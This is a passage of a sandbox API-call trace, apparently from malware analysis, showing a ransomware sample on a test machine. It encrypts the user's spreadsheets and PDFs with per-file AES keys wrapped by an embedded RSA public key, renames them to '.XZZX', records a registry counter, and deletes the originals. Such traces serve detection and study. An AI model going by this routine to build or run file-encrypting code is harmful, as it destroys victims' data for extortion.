HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\KtwKDD9P56tzPTxgwQR.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ktwkdd9p56tzptxgwqr.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494 [0039.685] ReadFile (in: hFile=0x494, lpBuffer=0x3e45838, nNumberOfBytesToRead=0x6896, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesRead=0x417e418*=0x6896, lpOverlapped=0x0) returned 1 [0039.686] CloseHandle (hObject=0x494) returned 1 [0039.686] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0039.686] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0039.686] SetErrorMode (uMode=0x1) returned 0x1 [0039.686] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0039.687] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2dca8) returned 1 [0039.689] CryptGenKey (in: hProv=0x3e2dca8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5090) returned 1 [0039.997] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.997] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.997] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.998] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.998] CryptDestroyKey (hKey=0x42e5090) returned 1 [0039.998] CryptReleaseContext (hProv=0x3e2dd30, dwFlags=0x0) returned 0 [0039.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\2525214410F7DA278BE33B7C150FBE6F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\2525214410f7da278be33b7c150fbe6f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0039.998] WriteFile (in: hFile=0x480, lpBuffer=0x3e45838*, nNumberOfBytesToWrite=0x6896, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesWritten=0x417e438*=0x6896, lpOverlapped=0x0) returned 1 [0039.999] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6896 [0039.999] WriteFile (in: hFile=0x480, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.000] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x689b [0040.000] WriteFile (in: hFile=0x480, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2e, lpOverlapped=0x0) returned 1 [0040.000] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x68c9 [0040.000] WriteFile (in: hFile=0x480, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.000] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x68ce [0040.000] SetErrorMode (uMode=0x1) returned 0x1 [0040.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0040.000] OutputDebugStringW (lpOutputString="end") [0040.000] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0040.000] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0040.000] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2ddb8) returned 1 [0040.001] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2ddb8, dwCertEncodingType=0x1, pInfo=0x3dd2cf8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2d28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2d30*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5090) returned 1 [0040.001] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.002] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0040.002] CryptEncrypt (in: hKey=0x42e5090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0040.002] CryptEncrypt (in: hKey=0x42e5090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2de40*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2de40*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0040.002] WriteFile (in: hFile=0x480, lpBuffer=0x3e2de40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2de40*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0040.002] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0040.002] WriteFile (in: hFile=0x480, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.002] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0040.043] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0040.043] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4a0) returned 0x0 [0040.044] RegQueryValueExW (in: hKey=0x4a0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x22, lpcbData=0x417dfdc*=0x4) returned 0x0 [0040.044] RegCloseKey (hKey=0x4a0) returned 0x0 [0040.044] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4a0) returned 0x0 [0040.044] RegSetValueExW (in: hKey=0x4a0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x23, cbData=0x4 | out: lpData=0x417dfec*=0x23) returned 0x0 [0040.044] RegCloseKey (hKey=0x4a0) returned 0x0 [0040.044] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.044] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.045] CloseHandle (hObject=0x480) returned 1 [0040.046] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0040.046] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0040.046] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\KtwKDD9P56tzPTxgwQR.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ktwkdd9p56tzptxgwqr.ods")) returned 1 [0040.048] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\KtwKDD9P56tzPTxgwQR.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ktwkdd9p56tzptxgwqr.ods")) returned 0 Thread: id = 129 os_tid = 0x91c [0039.916] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.917] lstrcpyW (in: lpString1=0x42cf460, lpString2="mPKKZqdrZkc7.pdf" | out: lpString1="mPKKZqdrZkc7.pdf") returned="mPKKZqdrZkc7.pdf" [0039.917] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.917] SetErrorMode (uMode=0x1) returned 0x1 [0039.917] lstrcpyW (in: lpString1=0x42cf860, lpString2="mPKKZqdrZkc7.pdf" | out: lpString1="mPKKZqdrZkc7.pdf") returned="mPKKZqdrZkc7.pdf" [0039.917] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x1d50dd1d, Data2=0x5579, Data3=0x45a5, Data4=([0]=0xa4, [1]=0x27, [2]=0xed, [3]=0x94, [4]=0xb7, [5]=0xf7, [6]=0x4f, [7]=0x8e))) returned 0x0 [0039.917] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\mPKKZqdrZkc7.pdf") returned 81 [0039.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0039.917] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned 102 [0039.917] StrStrW (lpFirst="mPKKZqdrZkc7.pdf", lpSrch="XZZX") returned 0x0 [0039.917] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\mPKKZqdrZkc7.pdf", dwFileAttributes=0x20) returned 1 [0039.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\mPKKZqdrZkc7.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\mpkkzqdrzkc7.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0039.917] ReadFile (in: hFile=0x480, lpBuffer=0x42d0048, nNumberOfBytesToRead=0xa72b, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesRead=0x42ce418*=0xa72b, lpOverlapped=0x0) returned 1 [0039.918] CloseHandle (hObject=0x480) returned 1 [0039.918] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0039.918] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0039.919] SetErrorMode (uMode=0x1) returned 0x1 [0039.919] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0039.919] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2dd30) returned 1 [0039.921] CryptGenKey (in: hProv=0x3e2dd30, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5110) returned 1 [0040.328] CryptExportKey (in: hKey=0x42e5110, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0040.328] CryptExportKey (in: hKey=0x42e5110, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0040.328] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.329] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0040.329] CryptDestroyKey (hKey=0x42e5110) returned 1 [0040.329] CryptReleaseContext (hProv=0x3e2dec8, dwFlags=0x0) returned 0 [0040.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\b4a323b51740b3fd1d50dd1d1b6d9845.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0040.329] WriteFile (in: hFile=0x4a4, lpBuffer=0x42d0048*, nNumberOfBytesToWrite=0xa72b, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d0048*, lpNumberOfBytesWritten=0x42ce438*=0xa72b, lpOverlapped=0x0) returned 1 [0040.330] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa72b [0040.330] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.330] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa730 [0040.330] WriteFile (in: hFile=0x4a4, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x20, lpOverlapped=0x0) returned 1 [0040.330] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa750 [0040.330] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.331] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa755 [0040.331] SetErrorMode (uMode=0x1) returned 0x1 [0040.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0040.331] OutputDebugStringW (lpOutputString="end") [0040.331] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0040.331] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0040.331] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2df50) returned 1 [0040.331] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2df50, dwCertEncodingType=0x1, pInfo=0x3dd2dc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2df8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2e00*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e5110) returned 1 [0040.331] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.332] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0040.332] CryptEncrypt (in: hKey=0x42e5110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0040.332] CryptEncrypt (in: hKey=0x42e5110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2dfd8*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2dfd8*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0040.332] WriteFile (in: hFile=0x4a4, lpBuffer=0x3e2dfd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2dfd8*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0040.332] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0040.332] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.332] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0040.332] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0040.332] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4a8) returned 0x0 [0040.332] RegQueryValueExW (in: hKey=0x4a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x23, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0040.333] RegCloseKey (hKey=0x4a8) returned 0x0 [0040.333] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4a8) returned 0x0 [0040.333] RegSetValueExW (in: hKey=0x4a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x24, cbData=0x4 | out: lpData=0x42cdfec*=0x24) returned 0x0 [0040.333] RegCloseKey (hKey=0x4a8) returned 0x0 [0040.333] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.333] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.333] CloseHandle (hObject=0x4a4) returned 1 [0040.335] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0040.336] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0040.336] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\mPKKZqdrZkc7.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\mpkkzqdrzkc7.pdf")) returned 1 [0040.337] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\mPKKZqdrZkc7.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\mpkkzqdrzkc7.pdf")) returned 0 Thread: id = 130 os_tid = 0x908 [0040.088] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.088] lstrcpyW (in: lpString1=0x417f460, lpString2="NMqv0Yc9MO55X.xls" | out: lpString1="NMqv0Yc9MO55X.xls") returned="NMqv0Yc9MO55X.xls" [0040.088] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.088] SetErrorMode (uMode=0x1) returned 0x1 [0040.088] lstrcpyW (in: lpString1=0x417f860, lpString2="NMqv0Yc9MO55X.xls" | out: lpString1="NMqv0Yc9MO55X.xls") returned="NMqv0Yc9MO55X.xls" [0040.088] CoCreateGuid (in: pguid=0x417e440 | out: 